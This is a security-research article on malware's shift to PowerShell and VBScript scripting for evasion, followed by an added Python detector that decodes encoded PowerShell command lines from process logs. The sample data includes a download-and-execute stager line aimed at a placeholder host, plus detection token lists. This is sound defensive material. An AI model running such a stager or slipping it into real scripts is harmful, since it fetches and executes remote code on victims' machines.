Malware has increasingly adopted scripting as a major technique, replacing the execution of compiled binaries dropped to disk. This transition took place mainly to evade the signature-based detection employed by many security vendors. To understand how this is achieved, one must first understand what scripting really is.
Scripting languages are interpreted languages that automate tasks which would otherwise be carried out manually by a human operator. Languages like PowerShell and VBScript were created to provide flexible capabilities, adaptable to different needs, and are used mainly by system administrators.
Activities such as victim reconnaissance, lateral movement, C&C communication and persistence are very similar in nature to the scripted actions used by administrators, making it hard for defenders to differentiate between routine, benign network management and its malicious counterpart.
In the past year, malware in the wild has developed new uses of scripting, making it the keystone of its operation. In our research, The Scripting Threat – Gaining Popularity, we followed this trend as it appeared in several different malware families.
In a gradual transition, samples belonging to different malware families adopted scripting techniques: first as part of the reconnaissance stage, and later also for persistence, privilege escalation, lateral movement, communication with C&C servers, and data exfiltration. Eventually, some malware became completely file-less, as demonstrated by the file-less Locky Ransomware sample below.
Figure: file-less Locky Ransomware sample, February 2016
There are a few causes for this trend – evasion, vast capabilities and time-to-market. Scripting helps malware evade detection through techniques such as obfuscation (for example, base64-encoded command lines), execution through legitimate, signed processes such as the script interpreters themselves, and sandbox detection.
Today, scripting languages provide attackers with the same capabilities as compiled executables. In many cases scripting is even easier, shortening time-to-market: an attacker can write a short script instead of developing full-scale file-based malware, and the difference could easily be a few days of work.
The last reason is the various difficulties security vendors face when dealing with scripts, which impair the protections capable of safeguarding against such threats. In fact, we found that even new variants of known malware can evade most antivirus software with only a few minor adjustments.
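The evasion and detection problems described above (an encoded PowerShell command line that defeats a plain substring signature, and the same stager launched from a document or script host) can be seen in a small decode-then-inspect detector run over process-creation log lines. This is an added example and not code from the original research or article; the log line format, the file names, the list of parent processes, the content tokens and the scoring threshold are assumptions chosen for illustration, and the sample log lines are constructed.

```python
"""Decode-then-inspect PowerShell launches from process-creation logs.

Added example, not from the original article. The log line format, the
file names and the scoring thresholds are assumptions made for illustration.
"""
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional


def encode_command(script: str) -> str:
    """Produce the argument powershell.exe expects after -EncodedCommand
    (base64 over UTF-16LE). This is the obfuscation step an attacker uses."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(b64: str) -> Optional[str]:
    """Reverse encode_command; None when the argument is not valid base64
    or does not decode as UTF-16LE text."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


# Hypothetical download-and-execute stager; example.invalid never resolves.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"

# Constructed sample log lines (assumed format): <ts> <parent> -> <image> :: <command line>
SAMPLE_LOGS = [
    "2016-02-10T09:12:01 explorer.exe -> powershell.exe :: powershell.exe Get-ChildItem C:\\Logs | Measure-Object",
    "2016-02-10T09:15:44 winword.exe -> powershell.exe :: powershell.exe -NoP -W Hidden -Exec Bypass -EncodedCommand " + encode_command(STAGER),
    "2016-02-10T09:20:13 cmd.exe -> powershell.exe :: powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1",
    "2016-02-10T09:31:05 wscript.exe -> powershell.exe :: powershell.exe -w hidden -c \"" + STAGER + "\"",
]

LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<parent>\S+) -> (?P<image>\S+) :: (?P<cmd>.*)$")
# A switch followed by a long base64-looking token. The switch name is checked
# separately because powershell.exe accepts any unambiguous prefix of -EncodedCommand.
SWITCH_RE = re.compile(r"(?<!\S)-([A-Za-z]+)\s+([A-Za-z0-9+/=]{8,})")

NAIVE_SIGNATURE = "downloadstring"  # what a raw-command-line signature would match on
OFFICE_AND_SCRIPT_HOSTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                           "wscript.exe", "cscript.exe", "mshta.exe"}  # assumed list
CONTENT_TOKENS = (r"\biex\b", r"invoke-expression", r"downloadstring", r"downloadfile",
                  r"net\.webclient", r"frombase64string")


@dataclass
class Verdict:
    ts: str
    parent: str
    command: str                 # command line exactly as logged
    decoded: Optional[str]       # decoded -EncodedCommand payload, if any
    naive_signature_hit: bool    # substring match on the raw command line only
    score: int
    reasons: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return self.score >= 3   # assumed threshold


def find_encoded_payload(cmd: str) -> Optional[str]:
    """Return the base64 argument of -EncodedCommand (or any prefix such as -e, -enc)."""
    for m in SWITCH_RE.finditer(cmd):
        switch = m.group(1).lower()
        if switch == "ec" or "encodedcommand".startswith(switch):
            return m.group(2)
    return None


def analyze(line: str) -> Optional[Verdict]:
    m = LOG_RE.match(line)
    if not m or m.group("image").lower() != "powershell.exe":
        return None
    ts, parent, cmd = m.group("ts"), m.group("parent"), m.group("cmd")
    score, reasons = 0, []

    payload = find_encoded_payload(cmd)
    decoded = decode_encoded_command(payload) if payload else None
    if payload is not None:
        score += 1
        reasons.append("encoded command")

    # Inspect the raw command line and the decoded payload together, so the
    # encoded variant of the stager is scored exactly like the plain one.
    text = (cmd + " " + (decoded or "")).lower()
    if parent.lower() in OFFICE_AND_SCRIPT_HOSTS:
        score += 2
        reasons.append("spawned by " + parent)
    if re.search(r"-w\w*\s+hidden", text):
        score += 1
        reasons.append("hidden window")
    if re.search(r"-ex\w*\s+bypass", text):
        score += 1
        reasons.append("execution policy bypass")
    for pattern in CONTENT_TOKENS:
        if re.search(pattern, text):
            score += 2
            reasons.append("content: " + pattern)

    return Verdict(ts, parent, cmd, decoded, NAIVE_SIGNATURE in cmd.lower(), score, reasons)


def analyze_logs(lines) -> List[Verdict]:
    return [v for v in map(analyze, lines) if v is not None]


if __name__ == "__main__":
    for v in analyze_logs(SAMPLE_LOGS):
        print(f"{v.ts} parent={v.parent} naive_sig={v.naive_signature_hit} "
              f"score={v.score} suspicious={v.suspicious} reasons={v.reasons}")
```

Running the block shows the point of the section: the plain stager (fourth line) trips the substring signature, while the byte-identical payload behind -EncodedCommand (second line) does not, yet both are flagged once the payload is decoded and the parent process and switches are taken into account. The administrator's backup script (third line) also uses -ExecutionPolicy Bypass and stays below the threshold, which is the benign-versus-malicious ambiguity described earlier.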